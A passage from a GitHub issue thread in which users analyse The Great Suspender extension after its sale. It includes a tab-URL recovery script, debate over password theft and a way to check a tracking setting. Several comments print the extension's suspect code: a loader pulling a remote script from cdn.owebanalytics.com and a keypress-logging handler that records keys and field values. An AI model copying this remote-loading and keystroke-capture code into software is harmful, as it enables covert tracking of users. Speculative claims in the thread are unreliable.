tokens=[],match,unmatched,regex,state=[0],next_match_idx=0,prev_match_idx,not_escaped_pattern=/(?:[^\\]|(?:^|[^\\])(?:\\\\)+)$/,whitespace_pattern=/^\s+$/,state_patterns=[/\s+|\/\*|["'>~+[(]/g,/\s+|\/\*|["'[\]()]/g,/\s+|\/\*|["'[\]()]/g,null,/\*\//g];for(sel=sel.trim();;){if(unmatched="",(regex=state_patterns[state[state.length-1]]).lastIndex=next_match_idx,!(match=regex.exec(sel))){unmatched=sel.substr(next_match_idx),saveUnmatched();break}if((prev_match_idx=next_match_idx)<(next_match_idx=regex.lastIndex)-match[0].length&&(unmatched=sel.substring(prev_match_idx,next_match_idx-match[0].length)),state[state.length-1]<3){if(saveUnmatched(),"["===match[0])state.push(1);else if("("===match[0])state.push(2);else if(/^["']$/.test(match[0]))state.push(3),state_patterns[3]=new RegExp(match[0],"g");else if("/*"===match[0])state.push(4);else if(/^[\])]$/.test(match[0])&&state.length>0)state.pop();else if(/^(?:\s+|[~+>])$/.test(match[0])&&(tokens.length>0&&!whitespace_pattern.test(tokens[tokens.length-1])&&0===state[state.length-1]&&tokens.push(" "),1===state[state.length-1]&&5===tokens.length&&"="===tokens[2].charAt(tokens[2].length-1)&&(tokens[4]=" "+tokens[4]),whitespace_pattern.test(match[0])))continue;tokens.push(match[0])}else tokens[tokens.length-1]+=unmatched,not_escaped_pattern.test(tokens[tokens.length-1])&&(4===state[state.length-1]&&(tokens.length<2||whitespace_pattern.test(tokens[tokens.length-2])?tokens.pop():tokens[tokens.length-1]=" ",match[0]=""),state.pop()),tokens[tokens.length-1]+=match[0]}return tokens.join("").trim()}</code></p> <p>Step 4: Run this:<br /> <code>var urls="";querySelectorAllDeep('.history-cards a#link').map( a=> { if (a.href) urls += a.href.replace(/^chrome.*?uri=/,"")+"\n"; }); console.log(urls); copy(urls);</code></p> <p>It should spit out all the urls one per line to the console AND copy them to your clipboard (you can paste the entire list in notepad or whatever you'd like :)</p> <p>could be modified to open all the tabs back up too...</p> </blockquote> <p>This works as intended in both Chrome and Brave browsers without any modification to code. Hope it doesn't get buried among all the comments and someone finds use for their lost urls.<br /> Thanks to @minig0d<br /> For the non-tech savy folks, after Step 2, right click anywhere and select inspect. Now select "Console" in the developer window which opened. You have to paste the above code in this section.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/50979867?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="weB04 picture"> <strong>weB04</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> 🚀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>So what type of Passwords were stolen?</p> <p>Typed, auto filled or chrome stored? Also I assume it's not possible for them to steal password manager master pw?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8909649?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Epicity picture"> <strong>Epicity</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>So what type of Passwords were stolen?</p> <p>Typed, auto filled or chrome stored? Also I assume it's not possible for them to steal password manager master pw?</p> </blockquote> <p>Most likely no passwords. Read above.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/44023416?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="smith558 picture"> <strong>smith558</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>It looks like the version 7.1.8 will, for me at least, log keypresses. Maybe I'm reading it wrong, but this appears to pull and run a JS file.</p> <p>From the <a rel="nofollow noopener" target="_blank" href="https://robwu.nl/crxviewer/crxviewer.html?crx=https%3A%2F%2Fwww.crx4chrome.com%2Fgo.php%3Fp%3D221789%26s%3D0%26l%3Dhttps%253A%252F%252Fclients2.googleusercontent.com%252Fcrx%252Fblobs%252FQgAAAC6zw0qH2DJtnXe8Z7rUJP0w4lDJ_bL6-4cEiO2dNd4wrSGFFOdFphokRztdPsQowUaOdWUtinT5tZeRv1Vf900oTts08327-tk8a_WqaBFZAMZSmuXCYMppUJZfV9giRXbSZIQVQDpezA%252Fextension_7_1_8_0.crx">archived link above</a>. (Thank you!)</p> <pre><code class="prettyprint">var owa_baseUrl = 'https://cdn.owebanalytics.com/'; var owa_cmds = owa_cmds || []; function loadOpenWebAnalytics(version) { owa_cmds.push(['trackPageView']); (function() { var _owa = document.createElement('script'); _owa.type = 'text/javascript'; _owa.async = true; _owa.src = owa_baseUrl + 'owa/modules/base/js/owa.tracker-combined-latest.minified.js?siteId=klbibkeccnjlkjkiokjodocebajanakg&apikey=2cf3d852ab70d359456ce3a0aac237a3&v=' + version; var _owa_s = document.getElementsByTagName('script')[0]; _owa_s.parentNode.insertBefore(_owa, _owa_s); })(); } </code></pre> <p>I pulled the file myself and unminified it. It logs a few things, including this:</p> <pre><code class="prettyprint"> keypressEventHandler: function(e) { e = e || window.event; var targ = this._getTarget(e); if (targ.tagName === "INPUT" && targ.type === "password") { return; } var key_code = e.keyCode ? e.keyCode : e.charCode; var key_value = String.fromCharCode(key_code); var event = new OWA.event(); event.setEventType("dom.keypress"); event.set("key_value", key_value); event.set("key_code", key_code); event.set("dom_element_name", targ.name); event.set("dom_element_value", targ.value); event.set("dom_element_id", targ.id); event.set("dom_element_tag", targ.tagName); this.addToEventQueue(event); }, </code></pre> <p><strong>Seems like it's trying not to log passwords</strong>, but if you've got other keypresses that you're inserting or have a website without a field that uses both input tags and password type, it might log them. It doesn't log 100% of the dom actions necessarily -- that's configurable with <code>logDomStreamPercentage</code>, but defaults to 100%. :(</p> </blockquote> <p>The exact code you posted will not log any keys. You copied it yourself: In this snippet, OWA is configured to only log page views and only with opt-out disabled <code>owa_cmds.push(['trackPageView']);</code></p> <p>See <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-773589901<br /> Also <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-773613175<br /> I feel like people are just repeating the same thing over and over instead of reading through this thread.</p> <p><strong>What we don't know is whether a different file was served by owebanalytics.com at any time.</strong> </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1471525?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="ne0phyte picture"> <strong>ne0phyte</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">4</span> 👍<span class="ml-2 mr-3">4</span> 😕<span class="ml-2 mr-3">1</span> 😄<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <blockquote> <p>This really is nano defender all over again, seriously, what is it with the smartest open source devs, making the most fucking dipshit transfer decisions.</p> </blockquote> <blockquote> <p></p> </blockquote> <blockquote> <p>This just proves that, if any project changes ownership, abandon ship till the new owners are proven trustworthy.</p> </blockquote> <p><strong>@Darkwolf1515</strong> Its about money everyone needs to eat nothing greedy about it. I do not judge him for that I do judge him for lying about it.</p> </blockquote> <p>So if I sold off your accounts to whoever, you'd be ok cause I "gotta eat" right?</p> <p>Just cause you need money doesn't mean you put others at risk, unbelievable.</p> </blockquote> <p>Ahhh no that would be illegal keep in mind he sold it, There was no (I do belive and hope so) ill intent on his pard. The fact he keeps protecting the buyer is what transfers it into the unacceptable. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/19692962?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="spacecabbie picture"> <strong>spacecabbie</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Ahhh no that would be illegal keep in mind he sold it, There was no (I do belive and hope so) ill intent on his pard. The fact he keeps protecting the buyer is what transfers it into the unacceptable.</p> </blockquote> <p>Erm why should he publish the buyer, I am sure that would be a crime of posting personal information, at least in normal countries like EU. It is a matter for law enforcement, not to make the mob of the internet happy. Thats not how law and justice system work. Everybody have rights, even criminals.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>Ahhh no that would be illegal keep in mind he sold it, There was no (I do belive and hope so) ill intent on his pard. The fact he keeps protecting the buyer is what transfers it into the unacceptable.</p> </blockquote> <p>Erm why should be publish the buyer, I am sure that would be a crime of posting personal information, at least in normal countries like EU.</p> </blockquote> <p>Not only that, he's probably tied to a strong NDA that forbids him doing so in the first place.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6998653?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="pojda picture"> <strong>pojda</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <blockquote> <p>Ahhh no that would be illegal keep in mind he sold it, There was no (I do belive and hope so) ill intent on his pard. The fact he keeps protecting the buyer is what transfers it into the unacceptable.</p> </blockquote> <p>Erm why should be publish the buyer, I am sure that would be a crime of posting personal information, at least in normal countries like EU.</p> </blockquote> <p>Not only that, he's probably tied to a strong NDA that forbids him doing so in the first place.</p> </blockquote> <p>Which, in itself, is pretty sketchy for anyone who claims to take over a popular browser extension with good intents.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1471525?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="ne0phyte picture"> <strong>ne0phyte</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>So, is it safe now to use latest github rep code (screenshot)? <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/commit/108c2370b030ea47296adc86bec8456cc5151e0e">108c237 on Oct 18, 2020</a></p> <p><img loading="lazy" src="https://user-images.githubusercontent.com/6180818/107028909-a3408700-67c7-11eb-910d-2096e24e1388.png" alt="scr" /></p> <hr /> <p>Oh, I see, what a sh?tstorm, better stick to <a rel="nofollow noopener" target="_blank" href="https://github.com/aciidic/thegreatsuspender-notrack">notrack</a> version...</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6180818?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Jollfye picture"> <strong>Jollfye</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Exactly, it’s dodgy as hell for him to sell this extension and not name the buyer or be forbidden to name him. We shouldn’t have trust in him at this point and I don’t understand why some of us still do. It’s misplaced loyalty to somebody who has by this action shown bad faith. </p> <p>When somebody slaps one side of your face only naive people turn their face and hope they don’t get slapped twice, you already got slapped once!! </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/827996?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="christhomas picture"> <strong>christhomas</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>So, is it safe now to use latest github rep code (screenshot)? <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/commit/108c2370b030ea47296adc86bec8456cc5151e0e">108c237 on Oct 18, 2020</a></p> <p>Oh, I see, what a sh?tstorm, better stick to <a rel="nofollow noopener" target="_blank" href="https://github.com/aciidic/thegreatsuspender-notrack">notrack</a> version...</p> </blockquote> <p>I'd use the marvellous suspender. Seems to be where everyone is going to.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/40576482?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="LewisSpring picture"> <strong>LewisSpring</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">11</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>This really is nano defender all over again, seriously, what is it with the smartest open source devs, making the most fucking dipshit transfer decisions.</p> <p>This just proves that, if any project changes ownership, abandon ship till the new owners are proven trustworthy.</p> </blockquote> <p>Man, I've used this for years and didn't even know it changed owners - probably the same as many many other people.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/12855940?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="adamstickley picture"> <strong>adamstickley</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>extension version 7.1.8 steals password and phone number? I am very worried about my password and phone number</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/52487964?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Windows10-YT picture"> <strong>Windows10-YT</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>for the last time, the Centos page is no sign of maliciousness. It is the<br /> default homepage that is hosted when the Centos nginx package is installed<br /> with default configuration...</p> <p>On Fri, Feb 5, 2021 at 12:23 AM NotWearingPants <a rel="nofollow noopener" target="_blank" href="mailto:notifications@github.com">notifications@github.com</a><br /> wrote:</p> <blockquote> <p><strong>@honestbleeps</strong> <a rel="nofollow noopener" target="_blank" href="https://github.com/honestbleeps">https://github.com/honestbleeps</a></p> <p>It's entirely likely / plausible that Google is calling this "malware" and<br /> it's may or may not be anything we'd traditionally call malware. Could be<br /> as simple as analytics.</p> <p>Ah yes, another one of those run of the mill analytics sites which has the<br /> CentOS homepage. Classic.<br /> I love those analytics services which have no way to sign up or see your<br /> analytics results.</p> <p>—<br /> You are receiving this because you commented.<br /> Reply to this email directly, view it on GitHub<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773796636">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773796636</a>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/ABJAKBIOUYU3ZM4DYO5FU2DS5N6EBANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/ABJAKBIOUYU3ZM4DYO5FU2DS5N6EBANCNFSM4TI37TGQ</a><br /> .</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5375237?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="cowbert picture"> <strong>cowbert</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>This might help with the migration.</p> <p><a rel="nofollow noopener" target="_blank" href="https://gist.github.com/munael/37f48cec7ecd17f94de551c91f3e4130">https://gist.github.com/munael/37f48cec7ecd17f94de551c91f3e4130</a></p> <p>Just put sensible <code>bad</code>/<code>good</code> substrings in <code>fix_url</code> (bad: old extension's leading substring/ID, good: new extension's) then run it either as an extension or through the dev console (should work, but I'm not a browser guy).</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5769148?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="munael picture"> <strong>munael</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>This might help with the migration.</p> <p><a rel="nofollow noopener" target="_blank" href="https://gist.github.com/munael/37f48cec7ecd17f94de551c91f3e4130">https://gist.github.com/munael/37f48cec7ecd17f94de551c91f3e4130</a></p> <p>Just put sensible <code>bad</code>/<code>good</code> substrings in <code>fix_url</code> (bad: old extension's leading substring/ID, good: new extension's) then run it either as an extension or through the dev console (should work, but I'm not a browser guy).</p> </blockquote> <p>Have you tried to use this?</p> <p>When I was trying to make a "Unsuspender", I couldn't access other extension URLs ("chrome-extentions://")</p> <p>Also chrome APIs can only be called from extentions afaik.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30575036?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="S10MC2015 picture"> <strong>S10MC2015</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>@S10MC2015<br /> I used it successfully through a dummy extension. I was able to access and change the URLs fine. Just gave it the <code>tabs</code> permission.</p> <p>Through the dev console, I can query tabs fine through <code>chrome.tabs.query</code>, but did _not_ try updating.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5769148?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="munael picture"> <strong>munael</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Is this version safe: </p> <p><a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa/related?hl=en">https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa/related?hl=en</a></p> <p>?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>For those worrying about TGS stealing passwords: I have a decent reason to believe that it did not.</p> <p>Developers:</p> <p>Chrome extensions are required to specifically declare which scripts are injected into pages, and which scripts run in a separate process. That means that the obvious technique of simply collecting keyPress events from the remote, loaded code is <strong>not possible</strong>, as that would only collect key-press events from within the extension page: ie, not your passwords.</p> <p>While TGS does inject a content script, that script is audit-able, as it is part of the extension. That script does not preform any mallicous activity: it is harmless.</p> <p><strong><em>HOWEVER</em></strong> the extension requests BROAD permissions: indeed, the extension of those permissions was one of the changes made to the web store version and not in Github. One of those permissions is the WebRequestBlocking capibility, which includes the ability to inspect all outgoing requests. That is what enables the advertising fraud described above: in most website designs, it would also allow intercepting all form data, <em>including passwords</em>. I believe some websites preform additional stages of encryption on that form data, but that is speculation.</p> <p>We have thoroughly examined the script that is currently being served from the remote server when accessed by a browser. HOWEVER, that technique is flawed. There are special request headers added when the extension itself makes the request (I'm almost certain: there are definitely headers added when you access with most other techniques), and because the server is not running OWA [1], it might have been configured to return an innocent script unless the request perfectly matches the expected headers.</p> <p>The real script, which was actually run, is much more likely to be malicious. AFAIK, that malicious remote would be able to access the Chrome API's, messing with traffic at will. Ad injection isn't on this list of capabilities, but basically everything else is.</p> <p>I will update the top post soon.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">24</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@TheMageKing</strong> If there was a malicious script running only when it received certain requests, does that mean that (hypothetically) it was targeting specific headers?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/55460785?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="BachoSeven picture"> <strong>BachoSeven</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@TheMageKing</strong> </p> <blockquote> <p>There are special request headers added when the extension itself makes the request</p> </blockquote> <p>And have you looked at the request the extension sends? Is the response not identical to a normal request? What headers are more specific than the user's IP? does it send the google account name for example?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>For those worrying about TGS stealing passwords: I have a decent reason to believe that it did not.</p> <p>Developers:</p> <p>Chrome extensions are required to specifically declare which scripts are injected into pages, and which scripts run in a separate process. That means that the obvious technique of simply collecting keyPress events from the remote, loaded code is <strong>not possible</strong>, as that would only collect key-press events from within the extension page: ie, not your passwords.</p> <p>While TGS does inject a content script, that script is audit-able, as it is part of the extension. That script does not preform any mallicous activity: it is harmless.</p> <p>_<strong>HOWEVER</strong>_ the extension requests BROAD permissions: indeed, the extension of those permissions was one of the changes made to the web store version and not in Github. One of those permissions is the WebRequestBlocking capibility, which includes the ability to inspect all outgoing requests. That is what enables the advertising fraud described above: in most website designs, it would also allow intercepting all form data, _including passwords_. I believe some websites preform additional stages of encryption on that form data, but that is speculation.</p> <p>We have thoroughly examined the script that is currently being served from the remote server when accessed by a browser. HOWEVER, that technique is flawed. There are special request headers added when the extension itself makes the request (I'm almost certain: there are definitely headers added when you access with most other techniques), and because the server is not running OWA [1], it might have been configured to return an innocent script unless the request perfectly matches the expected headers.</p> <p>The real script, which was actually run, is much more likely to be malicious. AFAIK, that malicious remote would be able to access the Chrome API's, messing with traffic at will. Ad injection isn't on this list of capabilities, but basically everything else is.</p> <p>I will update the top post soon.</p> <p>[1]: okay, so it could do this either way, but I want to emphasize that</p> </blockquote> <p>Thanks for this in-depth update, as I've been breaking my head trying to figure out how extensive the damage could be. It still can be extensive, but since keylogging is out of the way, then we can focus our attention to mitigate breaches on high profile targets.</p> <p>It's likely that this dynamic behavior of request interception is probably focusing on high value/high profile websites. I would warrant this would be top websites - Facebook, Amazon, Instagram; and quite possible big banking groups. I dunno the demographics of the userbase of the extension but I'd say that when the attacker purchased this extension he knew exactly what it was and tailored this exploit to it.</p> <p>Sadly the logged data we won't ever get back and is probably quite valuable in itself for further attacks in the future.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3511099?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tcvv picture"> <strong>tcvv</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I have this extension before, but OH DEAR! I might try reinstalling TGS again.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/66167734?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="kamekku14 picture"> <strong>kamekku14</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Do not reinstall the original TGS on the store (if it somehow allows you).<br /> If you need TGS, install thegreatsuspender-notrack or install<br /> TheMarvelousSuspender.</p> <p>On Fri, 5 Feb 2021, 16:19 Kamek the Magikoopa, <a rel="nofollow noopener" target="_blank" href="mailto:notifications@github.com">notifications@github.com</a><br /> wrote:</p> <blockquote> <p>I have this extension before, but OH DEAR! I might try reinstalling TGS<br /> again.</p> <p>—<br /> You are receiving this because you were mentioned.<br /> Reply to this email directly, view it on GitHub<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-774133288">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-774133288</a>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/AHJITPC56U2VWPBN3CPFDL3S5QLB5ANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/AHJITPC56U2VWPBN3CPFDL3S5QLB5ANCNFSM4TI37TGQ</a><br /> .</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30575036?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="S10MC2015 picture"> <strong>S10MC2015</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> ❤<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@ne0phyte</strong> Appreciate the correction. Didn't notice that. It's a relief.</p> <blockquote> <p><strong>What we don't know is whether a different file was served by owebanalytics.com at any time.</strong></p> </blockquote> <p>Good point. I'd pointed this out elsewhere and forgot to mention it above. I'll edit with a correction.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2160055?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="JosephCatrambone picture"> <strong>JosephCatrambone</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@jimcullenaus</strong> </p> <p>Welcome to the real world where all sorts of things happen behind the scenes that you never know about. You have a whole world of discovery to look forward to. I look forward to hearing about how that works out for you.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7757052?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michealespinola picture"> <strong>michealespinola</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I took the last one and a half hours to skim through many but not all of the comments above. What I took away from it is that nobody knows for sure whether passwords or other private data were actually compromised or not. I also got the impression that people were only affected if they didn't opt out of tracking in the extension settings.</p> <p>I may or may not have opted out of tracking. I wasn't sure and as the extension is currently deactivated and I have no intention of activating it isn't exactly simple to find out. But I managed to find out and here is how:</p> <p>I used a python module to read the LevelDB of the extension (thanks to jkmartindale at https://superuser.com/a/1559251/906802) and managed to read the database.</p> <pre><code class="prettyprint">$ mkdir db $ cp -a ~/.config/google-chrome/Default/Sync\ Extension\ Settings/klbibkeccnjlkjkiokjodocebajanakg/* db/ $ pip install leveldb $ python >>> import leveldb >>> db = leveldb.LevelDB('db') >>> db.Get(b'trackingOptOut') bytearray(b'false') </code></pre> <p>This makes a copy of the database (so we don't mess it up accidentally). The location of the database on your computer may vary depending on your OS. Then it installs a python module and opens a python shell. The python code just imports the module, opens the database and reads the tracking opt out value.</p> <p>In my case, I obviously didn't opt out, unfortunately.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/904704?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="liwo picture"> <strong>liwo</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>What I took away from it is that 